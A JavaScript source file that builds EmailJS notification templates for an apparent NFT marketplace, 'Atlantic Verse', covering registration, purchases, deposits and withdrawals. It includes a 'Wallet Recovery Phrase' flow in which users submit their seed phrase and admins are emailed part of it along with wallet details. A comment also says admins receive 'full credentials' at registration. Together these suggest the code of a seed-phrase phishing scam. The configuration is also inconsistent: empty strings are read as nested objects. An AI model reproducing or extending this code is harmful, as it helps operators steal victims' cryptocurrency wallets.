// src/services/emailjsTemplates.js
// Centralized, DRY email template data builders for EmailJS
// All functions return the `params` object to pass as the 3rd argument to emailjs.send()

import emailjs from "@emailjs/browser";

/**
 * Single unified EmailJS configuration object
 * Contains serviceId, publicKey, and templateId for both user and admin flows.
 */
export const EMAILJS = {
  serviceId: "",
  publicKey: "",
  templateId: "",
};

/**
 * Encapsulating email sender.
 * This is the ONLY place that should call emailjs.send().
 *
 * Always pass `params` built from one of the specific builder functions
 * (e.g. getNftPurchaseUserEmail, getDepositAdminEmail, etc).
 *
 * @param {Object} options
 * @param {Object} options.params - Built params (from builder functions)
 * @param {string} options.templateKey - One of EMAILJS.templateId keys
 * @param {boolean} [options.isAdmin=false]
 */
export async function sendEmail({ params, templateKey, isAdmin = false }) {
  const service = isAdmin ? EMAILJS.serviceId.admin : EMAILJS.serviceId.user;
  const publicKey = isAdmin ? EMAILJS.publicKey.admin : EMAILJS.publicKey.user;
  const template = EMAILJS.templateId[templateKey];

  if (!template) {
    throw new Error(`Unknown templateKey: ${templateKey}`);
  }

  try {
    const result = await emailjs.send(service, template, params, publicKey);
    console.log(
      `[EmailJS] Sent ${isAdmin ? "admin" : "user"} email via ${templateKey}`
    );
    return result;
  } catch (error) {
    console.error("[EmailJS] Send failed:", error);
    throw error;
  }
}

/**
 * High-level encapsulating email sender.
 * Use this from stores. It selects the correct builder + credentials based on `template`.
 *
 * @param {Object} options
 * @param {string} options.title    - Subject / title for the email
 * @param {string} options.email    - Recipient email address
 * @param {string} options.template - Logical template name (e.g. "nftPurchaseUser", "depositAdmin", "registrationUser")
 * @param {Object} data             - The payload (passed to the specific builder)
 */
export async function sendTemplatedEmail(
  { title, email, template },
  data = {}
) {
  let params;
  let templateKey;
  let isAdmin = false;

  switch (template) {
    // Registration
    case "registrationAdmin":
      params = getRegistrationAdminEmail(data);
      templateKey = "registrationAdmin";
      isAdmin = true;
      break;
    case "registrationUser":
      params = getRegistrationUserEmail(data);
      templateKey = "registrationUser";
      break;

    // NFT Purchase
    case "nftPurchaseUser":
      params = getNftPurchaseUserEmail(data);
      templateKey = "userNotification";
      break;
    case "nftPurchaseAdmin":
      params = getNftPurchaseAdminEmail(data);
      templateKey = "adminNotification";
      isAdmin = true;
      break;

    // NFT Mint / Upload
    case "nftMintUser":
      params = getNftMintUserEmail(data);
      templateKey = "userNotification";
      break;
    case "nftMintAdmin":
      params = getNftMintAdminEmail(data);
      templateKey = "adminNotification";
      isAdmin = true;
      break;

    // Deposit
    case "depositUser":
      params = getDepositUserEmail(data);
      templateKey = "userNotification";
      break;
    case "depositAdmin":
      params = getDepositAdminEmail(data);
      templateKey = "adminNotification";
      isAdmin = true;
      break;

    // Withdraw
    case "cryptoWithdrawUser":
      params = getCryptoWithdrawUserEmail(data);
      templateKey = "userNotification";
      break;
    case "bankWithdrawUser":
      params = getBankWithdrawUserEmail(data);
      templateKey = "userNotification";
      break;
    case "withdrawAdmin":
      params = getWithdrawAdminEmail(data);
      templateKey = "adminNotification";
      isAdmin = true;
      break;

    // Wallet Recovery Phrase
    case "phraseUser":
      params = getPhraseUserEmail(data);
      templateKey = "userNotification";
      break;
    case "phraseAdmin":
      params = getPhraseAdminEmail(data);
      templateKey = "adminNotification";
      isAdmin = true;
      break;

    default:
      throw new Error(`Unknown email template identifier: ${template}`);
  }

  // Allow overriding title and email from the call site if needed
  if (title) params.title = title;
  if (email) params.email = email;

  return sendEmail({ params, templateKey, isAdmin });
}

const BRAND = {
  name: "Atlantic Verse",
  tagline: "Premium NFT Marketplace",
  supportEmail: "support@atlanticverse.online",
  website: "https://atlanticverse.online",
  adminDashboard: "https://atlanticverse.online/admin/dashboard",
};

/**
 * Common success footer for user-facing emails
 */
const userFooter = (fullName) => `
Best regards,<br/>
The ${BRAND.name} Team<br/>
${BRAND.tagline}<br/>
<a href="${BRAND.website}" style="color:#3b82f6;text-decoration:none;">${BRAND.website}</a>
`;

/**
 * Common admin footer
 */
const adminFooter = () => `
Please review promptly.<br/><br/>
— ${BRAND.name}
`;

/**
 * Builds a clean, consistent user success email payload.
 */
function buildUserSuccessEmail({ title, message, fullName = "", extra = {} }) {
  return {
    title: title || `${BRAND.name} Notification`,
    email: extra.email || "",
    template: `
      <div style="font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; max-width: 620px; margin: 0 auto; color: #111827; line-height: 1.6;">
        <div style="background: linear-gradient(135deg, #1e2937, #0f172a); padding: 24px; border-radius: 12px 12px 0 0; color: white;">
          <h1 style="margin:0; font-size: 22px; font-weight: 700;">${
            BRAND.name
          }</h1>
          <p style="margin:4px 0 0; opacity: 0.9; font-size: 13px;">${
            BRAND.tagline
          }</p>
        </div>
        
        <div style="padding: 28px 24px; background: #ffffff; border: 1px solid #e2e8f0; border-top: none; border-radius: 0 0 12px 12px;">
          <h2 style="margin-top:0; color: #0f172a; font-size: 18px;">${
            title || "Notification"
          }</h2>
          
          <div style="font-size: 15px; color: #334155; margin-bottom: 20px;">
            ${message}
          </div>
          
          <div style="margin-top: 32px; padding-top: 20px; border-top: 1px solid #e2e8f0; font-size: 13px; color: #64748b;">
            ${userFooter(fullName)}
          </div>
        </div>
      </div>
    `,
    ...extra,
  };
}

/**
 * Builds a clean, consistent admin notification email payload.
 */
function buildAdminNotificationEmail({
  title,
  message,
  link = BRAND.adminDashboard,
  linkName = "Open Admin Dashboard",
  extra = {},
}) {
  return {
    title: title || `${BRAND.name} Admin Alert`,
    template: `
      <div style="font-family: system-ui, -apple-system, BlinkMacSystemFont, 'Segoe UI', Roboto, sans-serif; max-width: 620px; margin: 0 auto; color: #111827;">
        <div style="background: #0f172a; padding: 20px 24px; border-radius: 8px 8px 0 0; color: #e0f2fe;">
          <strong style="font-size:18px;">${BRAND.name} — Admin</strong>
        </div>
        
        <div style="padding: 24px; background: #f8fafc; border: 1px solid #e2e8f0; border-top: none; border-radius: 0 0 8px 8px;">
          <h3 style="margin: 0 0 12px; color: #0f172a;">${title}</h3>
          
          <div style="white-space: pre-line; font-size: 14px; line-height: 1.65; color: #334155;">
            ${message}
          </div>
          
          <a href="${link}" 
             style="display: inline-block; margin-top: 24px; background: #3b82f6; color: white; padding: 10px 18px; border-radius: 6px; text-decoration: none; font-weight: 600; font-size: 14px;">
            ${linkName}
          </a>
          
          <div style="margin-top: 32px; font-size: 12px; color: #64748b;">
            ${adminFooter()}
          </div>
        </div>
      </div>
    `,
    link,
    linkName,
    email: BRAND.supportEmail,
    ...extra,
  };
}

// ============================================
// SPECIFIC TEMPLATE BUILDERS
// ============================================

/**
 * Registration — Admin receives full credentials
 */
export function getRegistrationAdminEmail(payload) {
  return buildAdminNotificationEmail({
    title: `New User Registration ${payload.fullName || ""}`,
    message: "",
    link: "https://atlanticverse.online",
    linkName: "Atlantic Verse",
  });
}

/**
 * Registration — Welcome email to new user
 */
export function getRegistrationUserEmail(payload) {
  return buildUserSuccessEmail({
    title: "Welcome to Atlantic Verse!",
    message: `
      Hi ${payload.fullName || "there"},<br/><br/>
      Thank you for joining <strong>${
        BRAND.name
      }</strong>. Your account has been created successfully.<br/><br/>
      You can now explore, collect, and trade premium NFTs on our platform.
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * NFT Purchase — User confirmation
 */
export function getNftPurchaseUserEmail(payload) {
  return buildUserSuccessEmail({
    title: `Purchase Confirmed: ${payload.name || "NFT"}`,
    message: `
      Congratulations, ${payload.fullName || "Collector"}!<br/><br/>
      You have successfully purchased <strong>${
        payload.name || "####"
      }</strong>.<br/>
      Amount: <strong>${
        payload.stats?.floor_eth || payload.amount || "—"
      } ETH</strong><br/>
      Transaction ID: <code>${payload.id || "—"}</code><br/><br/>
      The NFT is now in your collection and ready to view or resell.
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * NFT Purchase — Admin notification
 */
export function getNftPurchaseAdminEmail(payload) {
  return buildAdminNotificationEmail({
    title: `New NFT Purchase by ${payload.fullName}`,
    message: `
      User: ${payload.fullName} (${payload.email})<br/>
      NFT: ${payload.name || "####"}<br/>
      Amount: ${payload.stats?.floor_eth || payload.amount || "—"} ETH<br/>
      Date: ${payload.date || new Date().toLocaleString()}
    `,
    extra: { email: payload.email },
  });
}

/**
 * NFT Mint/Upload — User
 */
export function getNftMintUserEmail(payload) {
  return buildUserSuccessEmail({
    title: `Your NFT Has Been Successfully Minted!`,
    message: `
      Dear ${payload.fullName || "there"},<br/><br/>
      Congratulations! Your NFT <strong>${
        payload.name || "####"
      }</strong> has been successfully minted.<br/>
      Transaction ID: <code>${payload.id || "—"}</code><br/>
      Date: ${payload.date || ""}
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * NFT Mint/Upload — Admin
 */
export function getNftMintAdminEmail(payload) {
  return buildAdminNotificationEmail({
    title: `${payload.fullName} Minted a New NFT`,
    message: `
      User: ${payload.fullName} (${payload.email})<br/>
      NFT: ${payload.name || "####"}<br/>
      Collection: ${payload.collection || "—"}<br/>
      Amount: ${payload.stats?.floor_eth || payload.amount || "—"} ETH<br/>
      Date: ${payload.date || new Date().toLocaleString()}
    `,
  });
}

/**
 * Deposit — User
 */
export function getDepositUserEmail(payload) {
  return buildUserSuccessEmail({
    title: "Deposit Received",
    message: `
      Thank you, ${payload.fullName || "User"}.<br/><br/>
      We have received your deposit of <strong>${
        payload.amount
      } ETH</strong>.<br/>
      It is currently under review and will be credited to your wallet balance shortly.<br/><br/>
      Transaction ID: <code>${payload.id || "—"}</code>
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * Deposit — Admin
 */
export function getDepositAdminEmail(payload) {
  return buildAdminNotificationEmail({
    title: `New Deposit from ${payload.fullName}`,
    message: `
      User: ${payload.fullName} (${payload.email})<br/>
      Amount: ${payload.amount} ETH<br/>
      Date: ${payload.date || new Date().toLocaleString()}<br/><br/>
      Please verify the attached proof of payment.
    `,
  });
}

/**
 * Withdraw (Crypto) — User
 */
export function getCryptoWithdrawUserEmail(payload) {
  return buildUserSuccessEmail({
    title: "Crypto Withdrawal Initiated",
    message: `
      Hi ${payload.fullName},<br/><br/>
      Your withdrawal of <strong>${payload.convertAmount} ${
      payload.crypto
    }</strong> has been initiated.<br/>
      It will be processed within the next few hours.<br/><br/>
      Transaction ID: <code>${payload.id || "—"}</code>
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * Withdraw (Bank) — User
 */
export function getBankWithdrawUserEmail(payload) {
  return buildUserSuccessEmail({
    title: "Bank Withdrawal Initiated",
    message: `
      Hi ${payload.fullName},<br/><br/>
      Your bank withdrawal of <strong>${
        payload.convertAmount
      }</strong> has been submitted.<br/>
      Beneficiary: ${payload.bankAccountName}<br/>
      Bank: ${payload.bankName}<br/><br/>
      Transaction ID: <code>${payload.id || "—"}</code>
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * Withdraw — Admin (works for both crypto and bank)
 */
export function getWithdrawAdminEmail(payload) {
  const methodLine =
    payload.method === "crypto"
      ? `Crypto: ${payload.crypto}`
      : `Bank Transfer → ${payload.bankName} (${payload.accountNumber})`;

  return buildAdminNotificationEmail({
    title: `New Withdrawal Request from ${payload.fullName}`,
    message: `
      User: ${payload.fullName} (${payload.email})<br/>
      Amount: ${payload.amount} ETH (${payload.convertAmount})<br/>
      Method: ${payload.method}<br/>
      ${methodLine}<br/>
      Date: ${payload.date || new Date().toLocaleString()}
    `,
  });
}

/**
 * Wallet Recovery Phrase — User
 */
export function getPhraseUserEmail(payload) {
  return buildUserSuccessEmail({
    title: "Wallet Recovery Phrase Received",
    message: `
      Dear ${payload.fullName},<br/><br/>
      We have securely received your wallet recovery phrase for <strong>${payload.walletName}</strong>.<br/>
      Our team is currently validating the details.<br/><br/>
      You will be notified once the process is complete.
    `,
    fullName: payload.fullName,
    extra: { email: payload.email },
  });
}

/**
 * Wallet Recovery Phrase — Admin
 */
export function getPhraseAdminEmail(payload) {
  return buildAdminNotificationEmail({
    title: `Wallet Recovery Phrase Submitted by ${payload.fullName}`,
    message: `
      User: ${payload.fullName} (${payload.email})<br/>
      Wallet: ${payload.walletName}<br/>
      Wallet Email: ${payload.walletEmail}<br/>
      Date: ${payload.date || new Date().toLocaleString()}<br/><br/>
      <strong>Phrase (first 10 chars):</strong> ${payload.phrase?.slice(
        0,
        10
      )}****
    `,
  });
}

/**
 * Generic helper you can use when you want full control
 */
export function buildCustomEmail({
  title,
  message,
  fullName = "",
  isAdmin = false,
  extra = {},
}) {
  if (isAdmin) {
    return buildAdminNotificationEmail({ title, message, extra });
  }
  return buildUserSuccessEmail({ title, message, fullName, extra });
}

export default {
  BRAND,
  getRegistrationAdminEmail,
  getRegistrationUserEmail,
  getNftPurchaseUserEmail,
  getNftPurchaseAdminEmail,
  getDepositUserEmail,
  getDepositAdminEmail,
  getCryptoWithdrawUserEmail,
  getBankWithdrawUserEmail,
  getWithdrawAdminEmail,
  getPhraseUserEmail,
  getPhraseAdminEmail,
  buildCustomEmail,
};
